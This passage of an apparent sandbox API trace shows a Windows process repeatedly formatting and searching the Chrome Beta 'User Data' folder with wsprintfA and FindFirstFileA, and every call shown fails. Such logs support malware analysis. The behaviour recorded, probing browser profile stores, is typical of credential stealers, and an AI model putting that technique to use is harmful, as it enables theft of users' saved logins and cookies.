param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.497] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.497] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.497] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.498] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.498] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.498] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.498] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.498] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.498] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.498] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.498] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.498] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.498] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.499] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.499] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.499] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.499] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.499] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.499] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.499] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.499] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.499] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.499] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.499] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.500] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.500] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.500] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.500] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.500] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.500] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.500] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.500] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.500] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.500] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.501] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.501] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.501] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.501] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.501] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.501] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.501] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.501] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.501] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.501] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.502] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.502] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.502] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.502] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.502] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.502] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.502] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.502] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.502] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.502] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.503] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.503] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.503] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.503] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.503] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.503] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.503] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.503] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.504] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.504] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.504] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.504] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.504] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User 